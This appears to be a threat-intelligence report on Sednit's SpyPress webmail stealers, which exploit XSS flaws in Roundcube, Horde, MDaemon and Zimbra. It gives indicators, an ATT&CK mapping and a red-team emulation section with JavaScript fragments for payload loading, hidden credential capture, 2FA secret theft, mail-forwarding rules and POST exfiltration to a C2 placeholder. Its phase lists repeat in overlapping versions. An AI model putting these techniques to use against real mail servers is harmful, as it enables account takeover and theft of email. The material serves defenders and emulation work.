AD3C590D1C0963D62702445E8108DB025EEBEC70 N/A JS/Agent.RSN SpyPress.ZIMBRA. EBF794E421BE60C9532091EB432C1977517D1BE5 N/A JS/Agent.RTD SpyPress.ROUNDCUBE. F81DE9584F0BF3E55C6CF1B465F00B2671DAA230 N/A JS/Agent.RWO SpyPress.ROUNDCUBE. A5948E1E45D50A8DB063D7DFA5B6F6E249F61652 N/A JS/Exploit.Agent.NSG XSS exploit for CVE-2023-43770. Network IP Domain Hosting provider First seen Details

Phase: Initial Access

• Technique: Exploiting Vulnerabilities in Webmail Servers
• Procedure: The attacker targets Zimbra, Roundcube, and Horde webmail servers by exploiting unpatched vulnerabilities remotely. These vulnerabilities can be triggered by sending specially crafted email messages.

Phase: Execution

• Technique: Cross-Site Scripting (XSS) Exploitation
• Procedure: Utilization of XSS exploits specifically crafted for vulnerabilities such as CVE-2023-43770 and CVE-2024-11182 to execute malicious scripts.

Phase: Data Exfiltration

• Technique: Email Exfiltration via Exploited Webmail
• Procedure: SpyPress.ZIMBRA exfiltrates email messages using a network protocol similar to SpyPress.HORDE, enabling the theft of email data without alerting the users.

The threat actor leverages known exploits and vulnerabilities to gain access to webmail servers and execute malicious actions effectively, focusing on exploiting outdated systems and remotely triggering vulnerabilities to steal sensitive information.

IP Domain Hosting provider First seen Details 185.225.69[.]223 sqj[.]fr 23VNet Kft. 2024-06-01 SpyPress C&C server. 193.29.104[.]152tgh24[.]xyz tuo[.]worldGLOBALAXS NOC PARIS 2024-06-04 SpyPress C&C server. 45.137.222[.]24 lsjb[.]digital Belcloud Administration 2024-07-03 SpyPress C&C server. 91.237.124[.]164 jiaw[.]shop HOSTGNOME LTD 2023-09-28 SpyPress C&C server. 185.195.237[.]106 hfuu[.]de Network engineer 2024-06-03 SpyPress C&C server. 91.237.124[.]153 raxia[.]top Damien Cutler 2024-06-03 SpyPress C&C server. 146.70.125[.]79 rnl[.]world GLOBALAXS NOC PARIS 2024-06-07 SpyPress C&C server. 89.44.9[.]74 hijx[.]xyz M247 Europe SRL 2024-07-05 SpyPress C&C server. 111.90.151[.]167 ikses[.]net Shinjiru Technology Sdn Bhd 2024-12-01 SpyPress C&C server. MITRE ATT&CK techniques This table was built using version 17 of the MITRE ATT&CK framework. Tactic ID Name Description Resource Development T1583.001Acquire Infrastructure: Domains Sednit bought domains at various registrars. T1583.004Acquire Infrastructure: Server Sednit rented servers at M247 and other hosting providers. T1587.004Develop Capabilities: Exploits Sednit developed (or acquired) XSS exploits for Roundcube, Zimbra, Horde, and MDaemon. T1587.001Develop Capabilities: Malware Sednit developed JavaScript stealers (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) to steal data from webmail servers. Initial Access T1190 Exploit Public-Facing Application Sednit exploited known and zero-day vulnerabilities in webmail software to execute JavaScript code in the context of the victim’s webmail window. Execution T1203 Exploitation for Client Execution SpyPress payloads are executed when a victim opens the malicious email in a vulnerable webmail client page. Defense Evasion T1027 Obfuscated Files or Information SpyPress payloads are obfuscated with an unknown JavaScript obfuscator. Credential Access T1187 Forced Authentication SpyPress payloads can log out users to entice them into entering their credentials in a fake login form. T1556.006Modify Authentication Process: Multi-Factor Authentication SpyPress.MDAEMON can steal the 2FA token and create an application password. Discovery T1087.003Account Discovery: Email Account SpyPress payloads get information about the email account, such as the contact list. Collection T1056.003Input Capture: Web Portal Capture SpyPress payloads try to steal webmail credentials by creating a hidden login form, to trick the browser and password managers into filling the credentials. T1119 Automated Collection SpyPress payloads automatically collect credentials and email messages. T1114.002Email Collection: Remote Email Collection SpyPress payloads collect and exfiltrate emails, from the victim’s mailbox. T1114.003Email Collection: Email Forwarding Rule SpyPress.MDAEMON adds a Sieve rule to forward any incoming email to an attacker-controlled email address. Command and Control T1071.001Application Layer Protocol: Web Protocols C&C communication is done via HTTPS. T1071.003Application Layer Protocol: Mail Protocols In case of email forwarding rules, the exfiltration is done via email. T1132.001Data Encoding: Standard Encoding Data is base64 encoded before being sent to the C&C server. Exfiltration T1020 Automated Exfiltration SpyPress payloads automatically exfiltrate credentials and email messages to the C&C server. T1041 Exfiltration Over C2 Channel SpyPress payloads exfiltrate data over the C&C channel.

Phase: Resource Development

• Technique: Acquire Infrastructure: Domains

• Description: Domains acquired at various registrars.

• Technique: Acquire Infrastructure: Server

• Description: Servers rented at M247 and other hosting providers.

• Technique: Develop Capabilities: Exploits

• Description: Developed/acquired XSS exploits for Roundcube, Zimbra, Horde, and MDaemon.

• Technique: Develop Capabilities: Malware

• Description: Developed JavaScript stealers (SpyPress variants) to steal data from webmail servers.

Phase: Initial Access

• Technique: Exploit Public-Facing Application
• Procedure: Exploited known and zero-day vulnerabilities in webmail software to execute JavaScript code.

Phase: Execution

• Technique: Exploitation for Client Execution
• Procedure: SpyPress payloads executed when a victim opens malicious emails in a vulnerable webmail client.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information
• Procedure: SpyPress payloads obfuscated with an unknown JavaScript obfuscator.

Phase: Credential Access

• Technique: Forced Authentication

• Procedure: Forces user logout to capture credentials in a fake login form.

• Technique: Modify Authentication Process: Multi-Factor Authentication

• Procedure: SpyPress.MDAEMON can steal 2FA tokens and create application passwords.

Phase: Discovery

• Technique: Account Discovery: Email Account
• Procedure: Acquire email account information, such as the contact list.

Phase: Collection

• Technique: Input Capture: Web Portal Capture

• Procedure: Creates a hidden login form to steal webmail credentials.

• Technique: Automated Collection

• Procedure: Automatically collects credentials and email messages.

• Technique: Email Collection: Remote Email Collection

• Procedure: Collects and exfiltrates emails from the victim’s mailbox.

• Technique: Email Collection: Email Forwarding Rule

• Procedure: Adds a Sieve rule to forward incoming emails to an attacker-controlled address.

Phase: Command and Control

• Technique: Application Layer Protocol: Web Protocols

• Procedure: C&C communication via HTTPS.

• Technique: Application Layer Protocol: Mail Protocols

• Procedure: Exfiltration via email in case of forwarding rules.

• Technique: Data Encoding: Standard Encoding

• Procedure: Data base64 encoded before transmission.

Phase: Exfiltration

• Technique: Automated Exfiltration

• Procedure: Automatically exfiltrates credentials and emails to the C&C server.

• Technique: Exfiltration Over C2 Channel

• Procedure: Data exfiltrated over the C&C channel.

Operation RoundPress TTPs for Red Team Emulation

Phase: Initial Access

• Technique: Spearphishing with XSS Exploitation
• Procedure:
• Craft a spearphishing email.
• Embed an XSS exploit payload within the email's HTML body to target specific webmail software (Roundcube, Horde, MDaemon, Zimbra).

Phase: Execution

• Technique: XSS Exploit Execution
• Procedure:
• User opens the malicious email in a vulnerable webmail instance.
• The XSS exploit injects malicious JavaScript (SpyPress payload) into the webmail page.
• The SpyPress JavaScript payload executes within the victim's browser context, capable of interacting with the victim's webmail session.

Phase: Persistence (limited)

• Technique: Reloading via malicious Email

• Procedure: The SpyPress payload reloads every time the victim opens the malicious email. The payload doesn't persist outside the email.

• Technique: Sieve Rule Creation (Roundcube)

• Procedure: The SpyPress payload creates a Sieve rule on Roundcube servers that forward copies of all incoming emails to an attacker-controlled address.

Phase: Credential Access

• Technique: Credential Stealing via Hidden Form
• Procedure:
• SpyPress creates hidden HTML form input fields (e.g., horde_user, horde_pass, User, Password, _user, _pass, username, password).
• A change event listener is attached to the password field.

• If the browser or password manager autofills the form, the event listener triggers, and SpyPress exfiltrates the credentials.

• Technique: Fake Logout with Credential Re-capture (Roundcube)

• Procedure:
• SpyPress. ROUNDCUBE logs the user out by creating an iframe to the /?_task=logout endpoint.
• User is prompted to log in again and credentials are captured.

Phase: Discovery

• Technique: Contact Discovery

• Procedure: -SpyPress.MDAEMON obtains the victim's contact list by requesting https:///WorldClient.dll?Session=&View=Contacts via javascript.

• Technique: Login History Discovery

• Procedure: -SpyPress.MDAEMON obtains the login history by requesting https:///WorldClient.dll?Session=&View=Options-Authentication&GetLoginHistory=Yes via javascript.

• Technique: Installed Plugins Discovery (Roundcube)

• Procedure: -SpyPress.ROUNDCUBE obtains information about Roundcube's version and installed plugins by requesting https:///?_task=settings&_framed=1&_action=about

Phase: Collection

• Technique: Email Collection
• Procedure:
• SpyPress payloads traverse the victim's mailbox folders.
• Excludes a hardcoded list of folders calendar, notes, documents, contacts, tasks, allowed senders, blocked senders.
• SpyPress retrieves and saves email messages and the source code to send to the C2.

Phase: MFA Bypass (MDaemon)

• Technique: 2FA Token Stealing and App Password Creation
• Procedure:
• SpyPress fetches 2FA secret from MDaemon instance to allow easy password generation.
• SpyPress gets App Password from MDaemon instance to access without any type of multi factor.

Phase: Exfiltration

• Technique: Data Exfiltration over C2 Channel
• Procedure: All SpyPress payloads exfiltrate collected data (credentials, contacts, emails) via HTTP POST requests to hardcoded C2 servers.
• Encoding: Data is likely base64 encoded before exfiltration.

Phase: Initial Access

• Technique: Spearphishing Link (T1566.002)
• Procedure: The attacker sends spearphishing emails containing an XSS payload embedded within the HTML body. These emails are disguised as legitimate news or communications to entice the victim to open them.
• Exploited Vulnerabilities:
  • Roundcube: CVE-2020-35730, CVE-2023-43770
  • MDaemon: CVE-2024-11182 (Zero-day)
  • Zimbra: CVE-2024-27443 (ZBUG-3730)
  • Horde: Unknown (old XSS vulnerability)

Phase: Execution

• Technique: Exploitation for Client Execution (T1203)
• Procedure: When the victim opens the malicious email in a vulnerable webmail client (Roundcube, Horde, MDaemon, or Zimbra), the XSS vulnerability triggers, injecting and executing malicious JavaScript (SpyPress payload) in the context of the victim's webmail session.
• Tool: Malicious JavaScript (SpyPress variants: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA)
• Inferred Command/Action (JavaScript Execution within Browser Context):
  • window.parent.eval(window.parent.atob('<base64_encoded_javascript_payload>')) (Observed in Horde and MDaemon exploits, where <base64_encoded_javascript_payload> is the primary payload)
  • document.currentScript.parentElement.style.display='none'; window.parent.eval(window.parent.atob('<base64_encoded_javascript_payload>')) (Observed in Roundcube exploit)
  • window['eval'](<function_to_get_atob>()](frames[0].document.getElementById('a-cashed-skinLayout2')['innerText'])) (Observed in Zimbra exploit, where innerText contains a base64-encoded JavaScript payload)

Phase: Defense Evasion

• Technique: Obfuscated Files or Information (T1027)
• Procedure: The JavaScript payloads (SpyPress variants) are heavily obfuscated. Variable and function names are randomized, and sensitive strings (like webmail URLs) are encrypted and decrypted only when used.

• Tool: Unknown JavaScript obfuscator

• Technique: Forced Authentication (T1187)

• Procedure: The malicious JavaScript (SpyPress.ROUNDCUBE) dynamically creates a hidden iframe that points to the webmail client's logout URL. This action logs out the victim from their current webmail session, forcing them to re-enter credentials. The script also adds an event listener to the legitimate login form's submit button to capture re-entered credentials.
• Inferred Command/Action (JavaScript DOM Manipulation/Browser Action):
  • document.createElement("iframe") (Creates an iframe element)
  • frame.src = get_logout_url() (Sets the iframe's source to the webmail logout URL)
  • button.addEventListener("click", button_submit_callback) (Adds an event listener to capture credentials on login form submission)

Phase: Credential Access

• Technique: Input Capture: Web Portal Capture (T1056.003)
• Procedure: The malicious JavaScript dynamically creates hidden HTML input fields (type="text", type="password", width="0%", opacity="0%") on the webmail page. These fields are named to match the legitimate login fields (e.g., horde_user/horde_pass for Horde, User/Password for MDaemon, _user/_pass for Roundcube), aiming to trick browsers' autofill features or password managers into populating them. Once populated, the values are exfiltrated.
• Tool: Malicious JavaScript (SpyPress variants)

• Inferred Command/Action (JavaScript DOM Manipulation):

  • document.createElement("input") (Creates an input element)
  • input_user.name = "<webmail_username_field_name>"; input_user.type = "text"; input_user.style.width = "0%"; input_user.style.opacity = "0"; (Sets attributes for a hidden username field)
  • input_pass.name = "<webmail_password_field_name>"; input_pass.type = "password"; input_pass.style.width = "0%"; input_pass.style.opacity = "0"; (Sets attributes for a hidden password field)
  • parent_element.appendChild(input_field); (Appends the hidden fields to the DOM)
  • input_pass.addEventListener("change", input_password_on_change); (Adds an event listener to trigger exfiltration when the password field's value changes)

• Technique: Modify Authentication Process: Multi-Factor Authentication (T1556.006)

• Procedure: The malicious JavaScript (SpyPress.MDAEMON) retrieves the victim's two-factor authentication (2FA) secret and can create a new application-specific password for the account. This enables the attacker to bypass 2FA requirements and access the mailbox directly via standard email clients.
• Tool: Malicious JavaScript (SpyPress.MDAEMON)
• Inferred Command/Action (JavaScript API Call - Fetching 2FA Secret):
  • fetch(window["origin"] + get_worldclient_url() + "&View=Options-Authentication&TwoFactorAuth=Yes&GetSecret=Yes", { method: "POST", body: new URLSearchParams(url_params) })
• Inferred Command/Action (JavaScript API Call - Creating App Password):
  • fetch(window["origin"] + get_worldclient_url() + "&View=Options-Authentication&CreateAppPassword=1s", { method: "POST", body: new URLSearchParams(url_params) })

Phase: Discovery

• Technique: Account Discovery: Email Account (T1087.003)
• Procedure: The malicious JavaScript payloads enumerate various information about the victim's email account, including contact lists, login history, mailbox folders, and email messages.
• Tool: Malicious JavaScript (SpyPress variants)
• Inferred Command/Action (JavaScript API Calls/DOM Access):
  • SpyPress.MDAEMON:
    • fetch(get_worldclient_url() + "&View=Options-Authentication&GetLoginHistory=Yes") (To retrieve login history)
    • fetch(get_worldclient_url() + "&View=Contacts") (To retrieve the contact list)
    • get_window_parent_parent().$WC.FOLDERS.getFolders() (To enumerate mailbox folders)
  • SpyPress.ROUNDCUBE:
    • fetch(get_addressbook_url()) (To retrieve the address book)
    • fetch(get_about_page_url()) (To retrieve the "about" page, which may contain version and plugin information)
    • rcmail.env.mailboxes (To access the list of mailbox folders)
  • SpyPress.ZIMBRA:
    • SOAP request to service/soap/SearchRequest with query in:contacts (To retrieve the contact list)
    • ZmSetting (To access global configuration and preference values)
    • SOAP request to service/soap/SearchRequest (To list folders and messages)

Phase: Collection

• Technique: Automated Collection (T1119)
• Procedure: The malicious JavaScript payloads are designed to automatically collect various types of data from the victim's webmail account, including credentials, contact information, login history, and the full content of email messages.

• Tool: Malicious JavaScript (SpyPress variants)

• Technique: Email Collection: Remote Email Collection (T1114.002)

• Procedure: The malicious JavaScript iterates through the victim's mailbox folders and pages, fetching the raw source content of individual email messages.
• Tool: Malicious JavaScript (SpyPress variants)

• Inferred Command/Action (JavaScript API Calls):

  • SpyPress.MDAEMON:
    • fetch(get_worldclient_url() + "&View=List&ReturnJavaScript=1&FolderID=<folder_ID>&Sort=RevDate&Page=<page>&UTF8=1") (To retrieve email message IDs within a folder)
    • fetch(get_worldclient_url() + "&View=Message&Source=Yes&Number=<email_ID>&FolderId=<folder_ID>") (To fetch the source of a specific email)
  • SpyPress.ROUNDCUBE:
    • fetch(get_mail_list_url()) (To retrieve email message IDs)
    • fetch(get_mail_source_url()) (To fetch the source of a specific email)
  • SpyPress.ZIMBRA:
    • SOAP request to service/soap/SearchRequest (To list folders and messages)
    • fetch('service/home/~/?auth=co&view=text&id=${id}') (To fetch the source of a specific email)

• Technique: Email Collection: Email Forwarding Rule (T1114.003)

• Procedure: The malicious JavaScript (SpyPress.ROUNDCUBE) creates a Sieve rule within the victim's Roundcube webmail account. This rule is configured to automatically forward a copy of every incoming email to an attacker-controlled email address.
• Tool: Malicious JavaScript (SpyPress.ROUNDCUBE)
• Inferred Command/Action (JavaScript API Call - HTTP POST to Roundcube API):
  • fetch(<Roundcube_API_endpoint>, { method: "POST", headers: { "X-Requested-With": "XMLHttpRequest", "X-Roundcube-Request": get_token() }, body: new URLSearchParams({ "_token": get_token(), "_task": "settings", "_action": "plugin.managesieve-save", "_framed": "1", "_fid": "", "_name": "InboxFilter", "_enabled": "1", "_join": "any", "_action_type[0]": "redirect_copy", "_action_target[0]": "<attacker_email_address>", "_action_mailbox[0]": "INBOX" }) }); (This is an internal API call made by JavaScript to the Roundcube server, not a direct shell command.)

Phase: Exfiltration

• Technique: Data Encoding: Standard Encoding (T1132.001)
• Procedure: All collected data, including credentials, contacts, email messages, and 2FA secrets, is base64 encoded before being transmitted to the C2 server.

• Inferred Command/Action (JavaScript Function):

  • b64encode_unescape_encodeURIComponent(data) (Example from SpyPress.HORDE)
  • window.parent.atob('<base64_payload>') (Implicit in payload execution and data handling, indicating base64 encoding for transfer)

• Technique: Exfiltration Over C2 Channel (T1041)

• Procedure: All collected and encoded data (credentials, contacts, login history, emails, 2FA secrets) is exfiltrated from the victim's webmail context to attacker-controlled C2 servers via HTTP POST requests.
• Tool: Malicious JavaScript (SpyPress variants)
• Inferred Command/Action (JavaScript API Call - HTTP POST):
  • fetch("<C2_URL>", { method: "POST", mode : "no-cors", body: <encoded_data> }) (Generic template for exfiltration)
  • px_C2_POST_Request("", (<user_value> + ""+ <pass_value>)) (Example from SpyPress.HORDE for credentials)
  • C2_POST_Request_async("emails", emails_list) (Example from SpyPress.MDAEMON for list of emails)
  • HTTP_request_webmail_api_then_exfiltrate_to_C2("mail-<folder>-<email_ID>", <email_source_url>) (Example from SpyPress.MDAEMON for email source)
  • zimbra_soap_request_then_exfiltrate_to_C2("co", "SearchRequest", content = {...}) (Example from SpyPress.ZIMBRA for contacts)